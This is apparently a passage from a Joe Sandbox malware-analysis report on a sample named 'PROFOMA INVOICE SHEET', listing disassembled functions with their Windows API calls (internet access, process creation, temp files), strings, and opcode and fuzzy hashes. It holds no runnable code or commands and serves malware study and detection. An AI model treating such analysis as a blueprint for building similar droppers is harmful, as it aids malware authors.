                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 1a6cd46651c306ea818ce5233d8f7b84bb810558eb891328dd937345d9eeff72
                                    • Instruction ID: c595abc35959064f6ad4a4206296a616cbc8b6d0c420bccf771b21ba2e0ae302
                                    • Opcode Fuzzy Hash: 1a6cd46651c306ea818ce5233d8f7b84bb810558eb891328dd937345d9eeff72
                                    • Instruction Fuzzy Hash: 491137B261020AAFDF02DFA8CC46EEA7BB8FB09314F015915F955E2250E735E8619B60
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0037CD7D
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0037CDA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: b3950b43cd133cc5cfbdfc6766f1eb84db40e4499eea0c3d30d7a10b617687df
                                    • Instruction ID: 3fc6c50f0525d2c8e2a1bbaf2165ef29ffa11cebe0c94ff418acd6759eccdc25
                                    • Opcode Fuzzy Hash: b3950b43cd133cc5cfbdfc6766f1eb84db40e4499eea0c3d30d7a10b617687df
                                    • Instruction Fuzzy Hash: E711C671225631BAD7364B668C85FE7BEACEF167A4F00922EB10D83180D7789C40D6F0
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 003934AB
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003934BA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: 8a3d4e2251dc06da7a7e11fa0631f3df6943674ad7ac644b8133ef7d92250c21
                                    • Instruction ID: d179d6adb5383e8b5d6046a10acffa60a95f4c4b061097657a3467ef57c56f76
                                    • Opcode Fuzzy Hash: 8a3d4e2251dc06da7a7e11fa0631f3df6943674ad7ac644b8133ef7d92250c21
                                    • Instruction Fuzzy Hash: C2116AB2100208ABEF139F65DC44ABB37AEEB05378F524724F965971E0C772EC519B60
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • CharUpperBuffW.USER32(?,?,?), ref: 00366CB6
                                    • _wcslen.LIBCMT ref: 00366CC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: STOP
                                    • API String ID: 1256254125-2411985666
                                    • Opcode ID: 27d08076f0c12afbe942142320af4dd95da2c0fa1056a030b5b6a3918e54455d
                                    • Instruction ID: aede6be8f3d7ed1fb3456282fdc9e14aacaad2f6a015820685bd1288c0a55b63
                                    • Opcode Fuzzy Hash: 27d08076f0c12afbe942142320af4dd95da2c0fa1056a030b5b6a3918e54455d
                                    • Instruction Fuzzy Hash: CE012B326009268BCB139FBDDC529BF77B8FF607907014539E452971D9EB31D840C650
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 00363CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00363CCA
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00361D4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: ef3d4de2f5a7364b9da96ea11b0b7ab6d4231aeb7f931e4c6a57b6c2b66cec0c
                                    • Instruction ID: 52905401c98192216e673e095f08acebcb63cd6585406af6f0b2c5fae80a523e
                                    • Opcode Fuzzy Hash: ef3d4de2f5a7364b9da96ea11b0b7ab6d4231aeb7f931e4c6a57b6c2b66cec0c
                                    • Instruction Fuzzy Hash: 5301D871651214ABCB06FBA4CC51DFE7768EB56350F08451AF8229B3C6EA315D1897A0
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 00363CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00363CCA
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00361C46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 00ed6825f661f4da2c8dd80f23101f72976a00ebc9133bcf977c96023fb3c684
                                    • Instruction ID: ced79dca776345b4e41ab830fe208f56f5111ce74ae730581aae397562491624
                                    • Opcode Fuzzy Hash: 00ed6825f661f4da2c8dd80f23101f72976a00ebc9133bcf977c96023fb3c684
                                    • Instruction Fuzzy Hash: CB01A775A8110467DB06EB90C962EFF77AC9B11340F18401AF5066B2CAEA60AE1897B1
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 00363CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00363CCA
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00361CC8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 6b566c0729012a8454b1f06f70d012827c1493b0df61817bff3bc9737840ea0c
                                    • Instruction ID: 431d6993282d9c70cee932cf2a293b8f3afaa29da75b4123f72cffcbd2a530d4
                                    • Opcode Fuzzy Hash: 6b566c0729012a8454b1f06f70d012827c1493b0df61817bff3bc9737840ea0c
                                    • Instruction Fuzzy Hash: 370186B5A8115867DB17EBA4CA11FFF77AC9B11340F18401AB802B72C6EA619F08D771
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0031A529
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer_wcslen
                                    • String ID: ,%=$3y5
                                    • API String ID: 2551934079-982647064
                                    • Opcode ID: 1c333e8eeaa14ec8dca2d1a6c6d96069919f05b8e44ec90336a5bdabcbfe8f35
                                    • Instruction ID: a0354ac3ba438aa466ca5771eff197f6e5d205c5814452cf69662de1bb364348
                                    • Opcode Fuzzy Hash: 1c333e8eeaa14ec8dca2d1a6c6d96069919f05b8e44ec90336a5bdabcbfe8f35
                                    • Instruction Fuzzy Hash: 08014732702A1087C90BF368B81BFEE735A8B0A711F400016F5012F2C3DE206D858697
                                    APIs
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003D3018,003D305C), ref: 003981BF
                                    • CloseHandle.KERNEL32 ref: 003981D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseCreateHandleProcess
                                    • String ID: \0=
                                    • API String ID: 3712363035-499741732
                                    • Opcode ID: c3486b466185352dc44f53b2e6dfaf5b4579d63023002ac813ac4d0177f6b8b1
                                    • Instruction ID: 8db42152385f9e680f62eea7aae35cdb4548b40c8c376ce8ee8d09c950665cd8
                                    • Opcode Fuzzy Hash: c3486b466185352dc44f53b2e6dfaf5b4579d63023002ac813ac4d0177f6b8b1
                                    • Instruction Fuzzy Hash: 27F05EF6641310BBE3226761BC45FB73B5CDB05750F000422BB0AD91A2D67A8E0483BA
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: 3, 3, 16, 1
                                    • API String ID: 176396367-3042988571
                                    • Opcode ID: c874151520c392b93b004b1aacf909a406fd36d303bca9e49e486c6d4b895f80
                                    • Instruction ID: 5894a0a34a8150923a5d161a241ffbe31379ab1a5176976cbe9b7bb7c9938759
                                    • Opcode Fuzzy Hash: c874151520c392b93b004b1aacf909a406fd36d303bca9e49e486c6d4b895f80
                                    • Instruction Fuzzy Hash: 6FE02B16204330109233327BBCC5A7F568ACFC5750734186BF985C7266EBD4CDD193A0
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00360B23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Message
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 2030045667-4017498283
                                    • Opcode ID: 0ffa339e09931b0db58b246c2f88a889de218f09d75ff5bf4001cf34ae541325
                                    • Instruction ID: ee1cf59857063d0ff7eb51a1fc75cb3fd107497b22a01de708321d35c597fad4
                                    • Opcode Fuzzy Hash: 0ffa339e09931b0db58b246c2f88a889de218f09d75ff5bf4001cf34ae541325
                                    • Instruction Fuzzy Hash: 8CE048312553183AD61737947C43FD97A848F09F51F10446AF7589D5C38BE2649046B9
                                    APIs
                                      • Part of subcall function 0031F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00320D71,?,?,?,0030100A), ref: 0031F7CE
                                    • IsDebuggerPresent.KERNEL32(?,?,?,0030100A), ref: 00320D75
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0030100A), ref: 00320D84
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00320D7F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 55579361-631824599
                                    • Opcode ID: 167a4e1581eb446e531eb934473bb59e28c347c8bb37304a5146cb504eff6d08
                                    • Instruction ID: 8358ef332470bd115926010a7aa974abca672c300f67da09bf9ec149a6dbbb25
                                    • Opcode Fuzzy Hash: 167a4e1581eb446e531eb934473bb59e28c347c8bb37304a5146cb504eff6d08
                                    • Instruction Fuzzy Hash: 96E092742013118FDB379FB8F4043927BE4AF04740F004D2EE4C2C6652DBB1E4488B91
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0031E3D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: 0%=$8%=
                                    • API String ID: 1385522511-2389475881
                                    • Opcode ID: 8b0e896e8382003051a41c62fd3ff537ff6c5f3195c1b8f4bcf129b438fd6741
                                    • Instruction ID: 60a5208ff32e484d882d5369311f5a1ab8a1b0008e0594dff3e941af4718e383
                                    • Opcode Fuzzy Hash: 8b0e896e8382003051a41c62fd3ff537ff6c5f3195c1b8f4bcf129b438fd6741
                                    • Instruction Fuzzy Hash: 99E02039C01A20CBC60F9758B858DC9735BBB1E320F5016A7E4228B1D29B3128818554
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0037302F
                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00373044
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: e140bbd80fb0116ba4da07ccd4a20ad7ff552ec2c49f3c07287472b72044a89f
                                    • Instruction ID: 413d6729e24dc442b0fe39c8cf92bb0473f10b2d643e4f9e2639470b4244d7a6
                                    • Opcode Fuzzy Hash: e140bbd80fb0116ba4da07ccd4a20ad7ff552ec2c49f3c07287472b72044a89f
                                    • Instruction Fuzzy Hash: 5ED05EB650032877DE20A7A4AC0EFCB3A6CDB04750F0006A2B695E2091DBB19984CBE0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %.3d$X64
                                    • API String ID: 481472006-1077770165
                                    • Opcode ID: c2bad3a2ca363e6c9e185706d43da75028a1687888a30741b209b0f5c6faf947
                                    • Instruction ID: a1ec3c7bdf18dcb982b34a3498487212421fd95ff95c33dcbb74cf50805fc609
                                    • Opcode Fuzzy Hash: c2bad3a2ca363e6c9e185706d43da75028a1687888a30741b209b0f5c6faf947
                                    • Instruction Fuzzy Hash: E6D01275808108E9CB6297D0CC45DF9B37CBB0C302F508856FC06D1850D624D54CABA1
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039232C
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0039233F
                                      • Part of subcall function 0036E97B: Sleep.KERNEL32 ref: 0036E9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 48fb997790fc22fdbb124b9f5177f5bed8440ac449e0c578033750a53cc599da
                                    • Instruction ID: 7c55f362beb7e3ffeaa393c4bf3f89e509d8f2078dfa731814c7e74241380b95
                                    • Opcode Fuzzy Hash: 48fb997790fc22fdbb124b9f5177f5bed8440ac449e0c578033750a53cc599da
                                    • Instruction Fuzzy Hash: 2BD0C9363A4310B6E665A7719C0FFC6AA689F40B10F015916B645AA1D4C9A5A8058A54
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039236C
                                    • PostMessageW.USER32(00000000), ref: 00392373
                                      • Part of subcall function 0036E97B: Sleep.KERNEL32 ref: 0036E9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 540b66834909ab866a5b4ff7bce79525e191a19edb3044e67c776cb7d43ce647
                                    • Instruction ID: 46f912d3600ee735ce41f2b34eb1cd4c59d34be6aa4b12b60b906968b8e9359e
                                    • Opcode Fuzzy Hash: 540b66834909ab866a5b4ff7bce79525e191a19edb3044e67c776cb7d43ce647
                                    • Instruction Fuzzy Hash: 13D0A9323903007AE666A3309C0FFC6A6289B00B00F004916B201EA0D4C9A0A8008A08